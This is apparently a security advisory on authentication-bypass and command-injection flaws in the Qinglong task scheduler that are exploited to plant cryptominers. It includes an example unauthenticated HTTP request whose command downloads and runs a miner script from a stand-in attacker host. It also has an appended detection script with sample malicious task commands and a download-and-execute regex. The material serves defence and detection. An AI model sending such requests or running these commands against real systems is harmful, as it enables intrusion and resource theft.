# Critical RCE Vulnerabilities in Qinglong Task Scheduler Exposed to Cryptomining Attacks


Researchers have identified two critical authentication bypass vulnerabilities in Qinglong, a popular open-source task scheduling tool used by developers worldwide, that are actively being exploited to deploy cryptocurrency miners on compromised servers. The flaws allow unauthenticated attackers to execute arbitrary code remotely, effectively giving them complete control over affected systems.


## The Threat


Threat actors are actively exploiting these vulnerabilities in the wild, targeting Qinglong installations exposed to the internet without proper access controls. The primary objective appears to be deploying cryptocurrency miners that siphon computing resources from victim servers to generate revenue for attackers. In some cases, researchers have observed attackers using compromised infrastructure for secondary objectives, including data exfiltration and lateral movement within organizational networks.


The exploitation appears widespread based on honeypot data and incident reports, with attackers likely using automated scanning tools to identify vulnerable Qinglong instances. The ease of exploitation—requiring only unauthenticated HTTP requests—has accelerated adoption among less sophisticated threat groups.


## Background and Context


### What is Qinglong?


Qinglong is an open-source task scheduling platform written in Node.js, designed to automate recurring tasks and provide centralized job management. It's particularly popular among developers in East Asian communities and has gained adoption globally for scenarios including:


  • Automated data collection and web scraping
  • System maintenance and backup scheduling
  • Integration with cloud services and APIs
  • Testing and monitoring workflows

The tool provides a web-based dashboard for configuration and monitoring, typically deployed on developer machines, VPS instances, or internal infrastructure. Many users expose Qinglong to the internet for remote management convenience, a practice that directly enables these attacks.


## Technical Details


### The Vulnerabilities


Security researchers identified two critical flaws that, when combined, allow complete authentication bypass:


| Vulnerability | Type | CVSS Score | Impact |
|---|---|---|---|
| API Endpoint Authentication Bypass | CWE-287 | 9.1 | Unauthenticated access to sensitive endpoints |
| Command Injection in Task Creation | CWE-78 | 9.3 | Remote code execution via malicious task parameters |


### Attack Flow


The exploitation chain follows a straightforward process:


1. Discovery: Attackers identify Qinglong instances using port scanning and banner identification (typically running on ports 5700, 5701, or custom configurations).
2. Authentication Bypass: The attacker sends a specially crafted HTTP request to unauthenticated API endpoints, bypassing token validation checks that should require login credentials.
3. Code Injection: Through vulnerable parameters in the task creation API, attackers inject shell commands or Node.js code that execute with the privileges of the Qinglong process.
4. Payload Delivery: The attacker creates a scheduled task that downloads and executes a cryptominer binary, or injects mining code directly into running processes.
5. Persistence: The malicious task is configured to restart automatically, ensuring the miner continues running even after system reboots.


### Exploitation Example


A typical attack might involve:


```http
POST /api/task HTTP/1.1
Host: target.com:5700
Content-Type: application/json

{
  "name": "system_update",
  "command": "wget http://attacker.com/miner.sh && bash miner.sh",
  "schedule": "* * * * *"
}
```

The vulnerable endpoint accepts this request without authentication and executes the command through the underlying shell interpreter.


## Implications for Organizations


### Immediate Risks


  • Cryptomining Impact: Deployed miners consume 30-80% of CPU resources, degrading performance and increasing electricity costs
  • Infrastructure Compromise: Attackers gain root or near-root execution context on affected servers
  • Lateral Movement: Compromised systems can be used as pivot points for attacks against connected networks
  • Data Exposure: Attackers may access sensitive files, environment variables, and credentials stored on the system

### Broader Business Impact


Organizations using Qinglong face several operational consequences:


  • Performance Degradation: Applications relying on Qinglong may experience slowdowns or timeouts
  • Cloud Cost Increases: For cloud-hosted instances, the cryptomining workload directly translates to higher compute bills
  • Supply Chain Risk: Compromised systems may affect downstream customers or partners relying on services hosted on affected infrastructure
  • Compliance Violations: Unauthorized cryptomining may breach compliance requirements (GDPR, HIPAA, PCI-DSS)

## Who Is Affected


Qinglong users most at risk include:


  • Developers running instances on personal servers or VPS providers without firewalls
  • DevOps teams using Qinglong for infrastructure automation without network segmentation
  • Small organizations lacking dedicated security teams or network monitoring
  • Cloud users who may not realize their bill increases are due to unauthorized cryptocurrency mining

## Recommendations


### Immediate Actions


1. Audit Exposure: Scan your network for exposed Qinglong instances using tools like Shodan or internal vulnerability scanners. Search for port 5700 or custom Qinglong ports in your environment.
2. Update Immediately: Upgrade to the latest patched version of Qinglong. Developers have released security updates addressing both vulnerabilities.
3. Network Segmentation: Restrict access to Qinglong instances to specific IP addresses or internal networks only. Never expose the web interface directly to the internet.
4. Review Logs: Check Qinglong logs for suspicious task creation requests, unusual command executions, or API access patterns indicating compromise.
5. Monitor Processes: Look for unexpected cryptocurrency miner processes (xmrig, xmr-stak, monero-miner) running on systems with Qinglong instances.


### Long-Term Hardening


  • Implement Authentication: Use VPN, SSH tunneling, or reverse proxies (nginx with authentication) to add security layers in front of Qinglong
  • Resource Monitoring: Deploy system monitoring to alert on sudden CPU spikes or unexpected process execution
  • Principle of Least Privilege: Run Qinglong with the minimum required permissions, not as root
  • Regular Patching: Subscribe to Qinglong security notifications and maintain a consistent update schedule
  • Network Monitoring: Implement egress filtering to detect suspicious outbound connections attempting to reach cryptocurrency mining pools

### Detection and Response


If you suspect compromise:


  • Isolate the affected system from the network immediately
  • Capture system memory and logs for forensic analysis
  • Search for unauthorized scheduled tasks: `crontab -l` and the Qinglong task database
  • Review recently modified files in the Qinglong installation directory
  • Check running processes for mining software: `ps aux | grep -i miner`
  • Rotate any credentials or API keys that may have been exposed
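The log-review step in Immediate Actions and the task and process checks above, as an added example that is not Qinglong's own code or anything from the article: a small Python triage script that scores task records in the shape of the article's POST body for download-and-execute commands, the miner names the article lists, and every-minute schedules, and scans `ps aux` output for the same miner names. The task records and process lines are constructed samples, and the task JSON shape is an assumption taken from the article's example rather than a verified Qinglong schema.

```python
import re

# Miner process names the article lists. DOWNLOAD_EXEC matches the download-and-execute
# shape of the article's example: a fetch tool whose result is piped or chained into a shell.
MINER_NAMES = ("xmrig", "xmr-stak", "monero-miner")
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl)\b[^|;&]*(\||&&|;)\s*(ba)?sh\b", re.IGNORECASE)
EVERY_MINUTE = "* * * * *"

# Constructed sample task records in the shape of the article's POST body (an assumed
# shape, not a verified Qinglong schema); the hosts are documentation placeholders.
SAMPLE_TASKS = [
    {"name": "nightly_backup", "command": "bash /ql/scripts/backup.sh", "schedule": "0 2 * * *"},
    {"name": "system_update", "command": "wget http://attacker.example/miner.sh && bash miner.sh", "schedule": "* * * * *"},
    {"name": "heartbeat", "command": "node /ql/scripts/ping.js", "schedule": "* * * * *"},
    {"name": "kthreadd", "command": "curl -s http://203.0.113.7/x | sh", "schedule": "*/10 * * * *"},
]
# Constructed `ps aux` lines (USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND).
SAMPLE_PROCESSES = [
    "root         1  0.0  0.1 169000 11000 ?  Ss  10:00  0:01 /sbin/init",
    "ql        2045  0.3  2.0 900000 80000 ?  Sl  10:01  0:12 node /ql/build/app.js",
    "ql        3310 97.5  1.2 600000 48000 ?  Sl  10:07 55:40 /tmp/.x/xmrig -o pool.example:3333",
]

def assess_task(task):
    """Return the reasons a task record looks like miner deployment (empty if none)."""
    cmd = task.get("command", "")
    reasons = []
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute")
    if any(name in cmd.lower() for name in MINER_NAMES):
        reasons.append("known miner name")
    if task.get("schedule", "").strip() == EVERY_MINUTE:
        reasons.append("every-minute schedule")
    return reasons

def suspicious_tasks(tasks):
    """Tasks worth a closer look; an every-minute schedule on its own is normal for a scheduler."""
    findings = []
    for task in tasks:
        reasons = assess_task(task)
        if reasons and reasons != ["every-minute schedule"]:
            findings.append((task.get("name"), reasons))
    return findings

def miner_processes(ps_lines):
    """Return `ps aux` lines whose COMMAND column (the 11th field) names a known miner."""
    commands = [(line, line.split(None, 10)[10:]) for line in ps_lines]
    return [line for line, cmd in commands if cmd and any(n in cmd[0].lower() for n in MINER_NAMES)]
```

Feed `suspicious_tasks` the task rows exported from the Qinglong task database and `miner_processes` the real `ps aux` output; the every-minute signal is kept as supporting context only, since legitimate jobs use that schedule too.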

## Conclusion


The Qinglong vulnerabilities represent a serious risk to developers and organizations relying on this tool. The simplicity of exploitation and obvious financial motivation for attackers suggest active, ongoing campaigns. Organizations should prioritize patching and network segmentation immediately, while implementing monitoring to detect any potential compromises. As with most RCE vulnerabilities, the best defense remains a combination of rapid patching, network access controls, and behavioral monitoring for indicators of compromise.